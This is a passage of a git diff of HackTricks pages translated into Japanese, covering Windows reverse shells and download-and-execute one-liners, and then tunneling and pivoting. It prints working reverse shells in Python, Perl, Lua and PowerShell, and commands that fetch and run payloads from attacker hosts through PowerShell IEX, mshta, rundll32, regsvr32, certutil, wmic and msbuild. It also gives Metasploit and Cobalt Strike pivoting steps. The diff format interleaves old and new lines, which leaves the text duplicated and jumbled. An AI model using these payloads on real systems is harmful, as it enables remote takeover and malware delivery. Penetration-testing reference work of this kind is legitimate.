[(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"
```
## Perl
Perlは、Windowsシステムで使用される多目的スクリプト言語です。Perlスクリプトは、Windowsシステムでのシェルアクセスやコマンドの実行に使用されます。Perlスクリプトを使用すると、Windowsシステムでの様々な操作を自動化することができます。
Perl (Practical Extraction and Reporting Language) は、テキスト処理やシステム管理などの用途に広く使用されるスクリプト言語です。Windows システムで Perl スクリプトを実行するためには、ActivePerl インストーラを使用して Perl インタプリタをインストールする必要があります。Perl スクリプトを Windows システムで実行する際には、.pl 拡張子を持つファイルを作成し、コマンドプロンプトや PowerShell から実行することが一般的です。
```bash
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
@ -52,7 +66,7 @@ ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.pope
```
## Lua
Lua
Luaは、スクリプト言語であり、多くのプラットフォームで使用されています。Luaは、高い拡張性と柔軟性を持ち、組み込みシステムから大規模なアプリケーションまで幅広い用途に使用されています。Luaは、シンプルで直感的な構文を持ち、C言語との統合が容易です。Luaスクリプトは、さまざまな用途に使用され、多くのアプリケーションで拡張性を提供しています。Luaは、ゲーム開発、ウェブ開発、組み込みシステム、およびその他のさまざまな分野で広く使用されています。
```bash
lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
```
@ -74,7 +88,7 @@ openssl.exe s_client -quiet -connect <ATTACKER_IP>:<PORT1>|cmd.exe|openssl s_cli
```
## Powershell
PowerShellは、Windowsシステムで広く使用されているスクリプト言語およびシェルフレームワークです。 PowerShellを使用すると、システム管理者は効率的にタスクを自動化し、システムの設定や管理を行うことができます。 PowerShellは、Windowsの機能を活用して、システム管理者がスクリプトを作成し、実行するための強力なツールです。
PowerShellは、Windowsシステムで広く使用されているスクリプト言語およびシェルフレームワークです。PowerShellを使用すると、システム管理者はタスクの自動化や構成管理を容易に行うことができます。PowerShellは、Windowsの機能を活用してシステムに対する高度な制御を提供します。
```bash
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')"
@ -82,44 +96,43 @@ Start-Process -NoNewWindow powershell "IEX(New-Object Net.WebClient).downloadStr
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile
```
ネットワークコールを実行するプロセス: **powershell.exe**\
ディスクに書き込まれたペイロード: **NO** (_少なくともprocmonを使用して見つけられる場所にはない_)
ディスクに書き込まれたペイロード: **NO** (_少なくともprocmonを使用して見つけられなかった_)
```bash
powershell -exec bypass -f \\webdavserver\folder\payload.ps1
```
**ネットワークコールを実行するプロセス: svchost.exe**\
**ディスクに書き込まれたペイロード: WebDAVクライアントローカルキャッシュ**
```bash
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
```
**このドキュメントの最後にさまざまなPowerShellシェルに関する詳細情報を取得してください**
## Mshta
```bash
mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
```
ネットワークコールを実行するプロセス: **mshta.exe**\
ディスクに書き込まれたペイロード: **IEローカルキャッシュ**
```bash
mshta http://webserver/payload.hta
```
ネットワークコールを実行するプロセス: **mshta.exe**\
ディスクに書き込まれたペイロード: **IEローカルキャッシュ**
```bash
mshta \\webdavserver\folder\payload.hta
```
ネットワークコールを実行するプロセス: **svchost.exe**\
ディスクに書き込まれたペイロード: **WebDAVクライアントローカルキャッシュ**
**ワンライナー:**
```bash
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
```
**このドキュメントの最後にさまざまなPowerShellシェルに関する詳細情報を取得する**
## Mshta
* [ここから](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
```bash
mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
```
```bash
mshta http://webserver/payload.hta
```
```bash
mshta \\webdavserver\folder\payload.hta
```
#### **hta-pshリバースシェルの例htaを使用してPSバックドアをダウンロードおよび実行**
```markup
```xml
<scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run "powershell -ep bypass -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('http://119.91.129.12:8080/1.ps1')"</scRipt>
```
**Koadicゾンビをステージャーhtaを使用して非常に簡単にダウンロードして実行できます**
**Koadicゾンビを非常に簡単にダウンロードして実行できます。ステージャーhtaを使用します**
#### htaの例
[**ここから**](https://gist.github.com/Arno0x/91388c94313b70a9819088ddf760683f)
```markup
```xml
<html>
<head>
<HTA:APPLICATION ID="HelloExample">
@ -136,7 +149,7 @@ new ActiveXObject('WScript.Shell').Run(c);
#### **mshta - sct**
[**ここから**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17)
```markup
```xml
<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
@ -152,6 +165,8 @@ var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
</scriptlet>
```
#### **Mshta - Metasploit**
Mshta is a utility in Windows that executes Microsoft HTML Applications (HTA). Metasploit has a module that can be used to execute malicious HTA payloads using mshta.exe. This technique can be used to bypass application whitelisting and execute code on a target system.
```bash
use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109
@ -164,26 +179,27 @@ Victim> mshta.exe //192.168.1.109:8080/5EEiDSd70ET0k.hta #The file name is given
```
**Defenderによって検出されました**
## **Rundll32**
[**Dll hello worldの例**](https://github.com/carterjones/hello-world-dll)
[**Dll hello world example**](https://github.com/carterjones/hello-world-dll)
* [こちらから](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
```bash
rundll32 \\webdavserver\folder\payload.dll,entrypoint
```
ネットワークコールを実行するプロセス: **svchost.exe**\
ディスクに書き込まれたペイロード: **WebDAVクライアントローカルキャッシュ**
```bash
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();
```
ネットワークコールを実行するプロセス: **rundll32.exe**\
ディスクに書き込まれたペイロード: **IEローカルキャッシュ**
**Defenderによって検出**
**Defenderによって検出されました**
**Rundll32 - sct**
[**こから**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17)
```bash
[**こちらから**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17)
```xml
<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
@ -213,22 +229,20 @@ run
rundll32.exe javascript:"\..\mshtml, RunHTMLApplication ";x=new%20ActiveXObject("Msxml2.ServerXMLHTTP.6.0");x.open("GET","http://10.2.0.5:9997/ownmG",false);x.send();eval(x.responseText);window.close();
```
## Regsvr32
* [ここから](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
```bash
regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
```
ネットワークコールを実行するプロセス: **regsvr32.exe**\
ディスクに書き込まれたペイロード: **IEローカルキャッシュ**
```
regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll
```
プロセスがネットワークコールを実行しています: **svchost.exe**\
ディスクに書き込まれたペイロード: **WebDAVクライアントローカルキャッシュ**
**Defenderによって検出されました**
#### Regsvr32 -sct
[**こから**](https://gist.github.com/Arno0x/81a8b43ac386edb7b437fe1408b15da1)
[**こちらから**](https://gist.github.com/Arno0x/81a8b43ac386edb7b437fe1408b15da1)
```markup
<?XML version="1.0"?>
<!-- regsvr32 /u /n /s /i:http://webserver/regsvr32.sct scrobj.dll -->
@ -258,6 +272,8 @@ run
## Certutil
* [ここから](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
B64dllをダウンロードし、デコードして実行します。
```bash
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
@ -271,7 +287,7 @@ certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
最も重要な脆弱性を見つけて修正できるようにします。Intruderは攻撃対象を追跡し、積極的な脅威スキャンを実行し、APIからWebアプリクラウドシステムまで、技術スタック全体で問題を見つけます。[**無料でお試しください**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) 今すぐ。
最も重要な脆弱性を見つけて、より速く修正できるようにします。Intruderは攻撃対象を追跡し、積極的な脅威スキャンを実行し、APIからWebアプリケーション、クラウドシステムまで、技術スタック全体で問題を見つけます。[**無料でお試しください**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) 今すぐ。
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
@ -314,17 +330,16 @@ python -m SimpleHTTPServer 80
```
victim> msiexec /quiet /i \\10.2.0.5\kali\shell.msi
```
**検出**
**検出されました**
## **Wmic**
```
* [こちらから](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
```bash
wmic os get /format:"https://webserver/payload.xsl"
```
プロセスがネットワークコールを実行しています: **wmic.exe**\
ディスクに書き込まれたペイロード: **IEローカルキャッシュ**
例としてxslファイルは[こちら](https://gist.github.com/Arno0x/fa7eb036f6f45333be2d6d2fd075d6a7)から取得できます:
```
例のxslファイルは[こちら](https://gist.github.com/Arno0x/fa7eb036f6f45333be2d6d2fd075d6a7)から:
```xml
<?xml version='1.0'?>
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0">
<output method="text"/>
@ -335,19 +350,18 @@ var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c echo IEX(New-Object N
</ms:script>
</stylesheet>
```
**検出されていません**
**検出されない**
**ステージャーwmicを使用して、非常に簡単にKoadicゾンビをダウンロードして実行できます**
**ステージャー wmic を使用して、非常に簡単に Koadic ゾンビをダウンロードして実行できます**
## Msbuild
* [ここから](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
```
cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"
```
ネットワークコールを実行するプロセス: **svchost.exe**\
ディスクに書き込まれたペイロード: **WebDAVクライアントローカルキャッシュ**
この技術を使用して、アプリケーションホワイトリストとPowershell.exeの制限をバイパスできます。PSシェルが表示されるようになります。\
これをダウンロードして実行してください: [https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj](https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj)
このテクニックを使用して、アプリケーションホワイトリストとPowershell.exeの制限をバイパスできます。PSシェルが表示されるようになります。\
これをダウンロードして実行してください:[https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj](https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj)
```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildShell.csproj
```
@ -359,39 +373,37 @@ C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildShell.csproj
```
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:shell.exe shell.cs
```
以下から基本的なC#リバースシェルをダウンロードできます[https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc](https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc)
以下から基本的なC#リバースシェルをダウンロードできます: [https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc](https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc)
**検出されていません**
## **Regasm/Regsvc**
```
* [こちらから](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
```bash
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll
```
ネットワークコールを実行するプロセス: **svchost.exe**\
ディスクに書き込まれたペイロード: **WebDAVクライアントローカルキャッシュ**
**試していません**
[**https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182**](https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182)
## Odbcconf
```
* [こちらから](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
```bash
odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}
```
プロセスがネットワークコールを実行中:**svchost.exe**\
ディスクに書き込まれたペイロード:**WebDAVクライアントローカルキャッシュ**
**試していません**
[**https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2**](https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2)
## Powershellシェル
## Powershell シェル
### PS-Nishang
[https://github.com/samratashok/nishang](https://github.com/samratashok/nishang)
**Shells**フォルダにはさまざまなシェルがあります。Invoke-_PowerShellTcp.ps1_をダウンロードして実行するには、スクリプトのコピーを作成し、ファイルの末尾に追加します
**Shells**フォルダにはさまざまなシェルがあります。_Invoke-_PowerShellTcp.ps1_をダウンロードして実行するには、スクリプトのコピーを作成し、ファイルの末尾に追加します:
```
Invoke-PowerShellTcp -Reverse -IPAddress 10.2.0.5 -Port 4444
```
@ -456,7 +468,7 @@ msfconsole -r <resource_file>
```
msfconsole -r unicorn.rc
```
以下の手順を実行して、被害者の端末で _powershell\_attack.txt_ ファイルを提供するWebサーバーを起動し、実行します:
次のようにして、_powershell\_attack.txt_ ファイルを提供するウェブサーバーを起動し、被害者の端末で実行します:
```
powershell -exec bypass -c "iwr('http://10.2.0.5/powershell_attack.txt')|iex"
```
@ -465,7 +477,8 @@ powershell -exec bypass -c "iwr('http://10.2.0.5/powershell_attack.txt')|iex"
## もっと
[PS>Attack](https://github.com/jaredhaight/PSAttack) は、いくつかの攻撃的なPSモジュールが事前にロードされたPSコンソール暗号化済み\
[WinPWN](https://github.com/SecureThisShit/WinPwn) は、いくつかの攻撃的なPSモジュールとプロキシ検出が組み込まれたPSコンソールIEX
[https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f9](https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f93c)[\
WinPWN](https://github.com/SecureThisShit/WinPwn) は、いくつかの攻撃的なPSモジュールとプロキシ検出が組み込まれたPSコンソールIEX
## 参考文献
@ -475,26 +488,26 @@ powershell -exec bypass -c "iwr('http://10.2.0.5/powershell_attack.txt')|iex"
* [https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/](https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/)
* [https://www.hackingarticles.in/koadic-com-command-control-framework/](https://www.hackingarticles.in/koadic-com-command-control-framework/)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
* [https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
最も重要な脆弱性を見つけて修正を迅速化します。Intruderは攻撃面を追跡し、積極的な脅威スキャンを実行し、APIからWebアプリ、クラウドシステムまでの技術スタック全体で問題を見つけます。[**無料でお試しください**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) 今すぐ。
最も重要な脆弱性を見つけて修正を迅速化します。Intruderは攻撃面を追跡し、積極的な脅威スキャンを実行し、APIからWebアプリ、クラウドシステムまでの問題を見つけます。[**無料でお試しください**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) 今すぐ。
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
<details>
<summary><strong>**ゼロからヒーローまでのAWSハッキングを学ぶ**</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary><strong>ゼロからヒーローまでのAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong>!</strong></summary>
HackTricksをサポートする他の方法
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスウォッグ**](https://peass.creator-spring.com)を手に入れる
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFT**](https://opensea.io/collection/the-peass-family)コレクションを見る
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)をフォローする。
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks)のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つけ
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**をフォローする。**
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks)のgithubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください
</details>

340
generic-methodologies-and-resources/tunneling-and-port-forwarding.md
View file

@ -4,18 +4,18 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**してみたいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションをご覧ください
* [**公式PEASSHackTricks swag**](https://peass.creator-spring.com)を手に入れましょう
* **[💬](https://emojipedia.org/speech-balloon/) [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter**で**🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
* **[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出して、あなたのハッキングトリックを共有してください。
</details>
## Nmapのヒント
{% hint style="warning" %}
**ICMP****SYN**スキャンはソックスプロキシを介してトンネリングすることはできませんので、これを動作させるためには**ping discoveryを無効化**(`-Pn`)し、**TCPスキャン**(`-sT`)を指定する必要があります。
**ICMP**および**SYN**スキャンはソックスプロキシを介してトンネリングすることはできませんので、これを実現するには**ping discoveryを無効に** (`-Pn`) し、**TCPスキャン** (`-sT`) を指定する必要があります。
{% endhint %}
## **Bash**
@ -42,7 +42,7 @@ SSHグラフィカル接続X
```bash
ssh -Y -C <user>@<ip> #-Y is less secure but faster than -X
```
### ローカルポート2ポート
### ローカルポートツーポート
SSHサーバーで新しいポートを開く --> 他のポート
```bash
@ -52,7 +52,7 @@ ssh -R 0.0.0.0:10521:127.0.0.1:1521 user@10.0.0.1 #Local port 1521 accessible in
```bash
ssh -R 0.0.0.0:10521:10.0.0.1:1521 user@10.0.0.1 #Remote port 1521 accessible in port 10521 from everywhere
```
### ポート2ポート
### ポートツーポート
ローカルポート --> 侵害されたホストSSH --> 第三のボックス:ポート
```bash
@ -62,13 +62,13 @@ sudo ssh -L 631:<ip_victim>:631 -N -f -l <username> <ip_compromised>
```
### Port2hostnet (proxychains)
ローカルポート --> 侵害されたホストSSH --> どこでも
ローカルポート --> 危険にさらされたホストSSH --> どこでも
```bash
ssh -f -N -D <attacker_port> <username>@<ip_compromised> #All sent to local port will exit through the compromised server (use as proxy)
```
### リバースポートフォワーディング
これは、DMZを介して内部ホストから逆シェルを取得するために役立ちます。
これは、内部ホストから DMZ を介してホストにリバースシェルを取得するために役立ちます。
```bash
ssh -i dmz_key -R <dmz_internal_ip>:443:0.0.0.0:7000 root@10.129.203.111 -vN
# Now you can send a rev to dmz_internal_ip:443 and caputure it in localhost:7000
@ -79,7 +79,7 @@ ssh -i dmz_key -R <dmz_internal_ip>:443:0.0.0.0:7000 root@10.129.203.111 -vN
```
### VPNトンネル
両方のデバイスで**root権限**が必要です(新しいインターフェースを作成するためです。また、sshdの設定でrootログインが許可されている必要があります\
両方のデバイスで**root権限**が必要です(新しいインターフェースを作成するため。また、sshdの設定でrootログインを許可する必要があります:\
`PermitRootLogin yes`\
`PermitTunnel yes`
```bash
@ -89,29 +89,19 @@ ifconfig tun0 up #Activate the client side network interface
ip addr add 1.1.1.1/32 peer 1.1.1.2 dev tun0 #Server side VPN IP
ifconfig tun0 up #Activate the server side network interface
```
サーバーサイドで転送を有効にする
サーバーサイドで転送を有効にします。
```bash
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -s 1.1.1.2 -o eth0 -j MASQUERADE
```
クライアント側で新しいルートを設定します。
```bash
# ローカルポート 8080 をリモートホストのポート 80 に転送する
ssh -L 8080:localhost:80 user@remote_host
# ローカルポート 8080 をリモートホストのポート 80 に転送する(バックグラウンド実行)
ssh -f -N -L 8080:localhost:80 user@remote_host
```
これにより、クライアント側のポート 8080 にアクセスすると、リモートホストのポート 80 にトンネリングされます。
```
route add -net 10.0.0.0/16 gw 1.1.1.1
```
## SSHUTTLE
ホストを介してサブネットワークへのすべてのトラフィックを**ssh**を介して**トンネル**することができます。\
例えば、10.10.10.0/24に向かうすべてのトラフィックを転送します。
**SSHUTTLE**を使用して、ホストを介してサブネットワークへのすべてのトラフィックを**ssh**経由で**トンネリング**できます。\
たとえば、10.10.10.0/24に向かうすべてのトラフィックを転送する場合
```bash
pip install sshuttle
sshuttle -r user@host 10.10.10.10/24
@ -125,18 +115,14 @@ sshuttle -D -r user@host 10.10.10.10 0/0 --ssh-cmd 'ssh -i ./id_rsa'
### ポートツーポート
ローカルポート --> 侵害されたホスト(アクティブセッション) --> 第三のボックス:ポート
ローカルポート --> 侵害されたホスト(アクティブセッション) --> サードボックス:ポート
```bash
# Inside a meterpreter session
portfwd add -l <attacker_port> -p <Remote_port> -r <Remote_host>
```
SOCKS (Socket Secure)は、ネットワークプロトコルの一種であり、TCP/IP接続を通じてデータを転送するためのプロキシサーバーを提供します。SOCKSプロキシは、クライアントとサーバーの間に中間者として機能し、トラフィックを転送することができます。SOCKSプロキシを使用することで、ユーザーは自分のIPアドレスを隠すことができ、ネットワーク上の制限を回避することができます。
### SOCKS
SOCKSプロキシを使用するためには、クライアントアプリケーションがSOCKSプロトコルをサポートしている必要があります。一般的なSOCKSプロキシクライアントとしては、curlやsshなどがあります。
SOCKSプロキシを使用してトンネリングやポートフォワーディングを行う場合、クライアントアプリケーションはSOCKSプロキシサーバーに接続し、プロキシサーバーを介して目的のサーバーに接続します。このようにすることで、クライアントアプリケーションはプロキシサーバーを通じてトラフィックを転送し、目的のサーバーにアクセスすることができます。
SOCKSプロキシを使用したトンネリングやポートフォワーディングは、ネットワークセキュリティやプライバシーの向上に役立ちます。また、制限されたネットワーク環境下でのアクセスや、地理的な制約を回避するためにも使用されます。
SOCKSは、ネットワーク内のトラフィックを転送するためのプロキシプロトコルです。通常、ファイアウォールをバイパスするために使用されます。SOCKSプロキシを使用すると、クライアントはリモートサーバーに直接接続する代わりに、プロキシサーバーを介して接続します。
```bash
background# meterpreter session
route add <IP_victim> <Netmask> <Session> # (ex: route add 10.10.10.14 255.255.255.0 8)
@ -144,7 +130,7 @@ use auxiliary/server/socks_proxy
run #Proxy port 1080 by default
echo "socks4 127.0.0.1 1080" > /etc/proxychains.conf #Proxychains
```
別の方法:
もう一つの方法:
```bash
background #meterpreter session
use post/multi/manage/autoroute
@ -159,9 +145,9 @@ echo "socks4 127.0.0.1 1080" > /etc/proxychains.conf #Proxychains
```
## Cobalt Strike
### SOCKSプロキシ
### SOCKS proxy
ビーコンを介してトラフィックをルーティングするために使用できるすべてのインターフェースでリッスンするためのチームサーバーでポートを開きます。
**ビーコンを介してトラフィックをルーティング**するために使用できるすべてのインターフェースでリッスンしているチームサーバーでポートを開きます。
```bash
beacon> socks 1080
[+] started SOCKS4a server on: 1080
@ -172,22 +158,16 @@ proxychains nmap -n -Pn -sT -p445,3389,5985 10.10.17.25
### rPort2Port
{% hint style="warning" %}
